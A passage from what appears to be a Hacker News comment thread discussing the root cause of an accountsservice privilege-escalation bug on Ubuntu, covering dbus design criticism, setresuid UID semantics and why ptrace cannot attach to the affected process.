dbus (the subject of this article) for exactly these reasons. So, it’s not surprising there are security holes like this. We’re currently in a situation where Linux’s userspace has reimplemented unix permissions in a way that only a few understand, and manages a sprawling multi-process asynchronous state machine on top of that. The authors of this mess didn’t bother to write manpages for the underlying daemons, so the inner workings of this stuff is extremely obscure and unvetted. Worse, it has hooks into everything in the Linux desktop, and has been spreading like cancer for over a decade.


I think there is a large part of that story missing. If the accounts daemon drops privileges for reading from the user's home, how can it ever get back to its normal state? How could two users run the same operation concurrently?

Normally that privilege dropping should happen after forking, right? And if it does the parent process should respond to gdm's inquiry.

That being said, the initial settings thing is probably good for a few more escalations as its usecase does not seem to fit the standard security measures very well.


From the setresuid(2) man page:

> An unprivileged process may change its real UID, effective UID, and saved set‐user‐ID, each to one of: the current real UID, the current effective UID or the current saved set‐user‐ID.

accountsservice did something like setresuid(uid, uid, -1), which set both real and effective UIDs, but kept saved set‐user‐ID as root, so that it could re-gain root privileges later.

Setting EUID was the correct course of action; but setting real UID let the unprivileged user kill the process.


Would it have been possible to attach a debugger to accountsservice in this state and execute arbitrary code, including re-gaining root privileges?


Very good question. :-) No, you can't use ptrace(2) on a process that has changed its EUID. For details, see PR_SET_DUMPABLE in the prctl(2) man page.


Great. I expected that possibly the real UID controlled this, it's good that it's not the case.


No, you can't usually attach a debugger to a process (with Ubuntu's default settings).


I believe with seteuid the process can temporarily assume the uid of the user in question and later restore the original uid.


Consider applying for YC's first-ever Fall batch! Applications are open till Aug 27.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: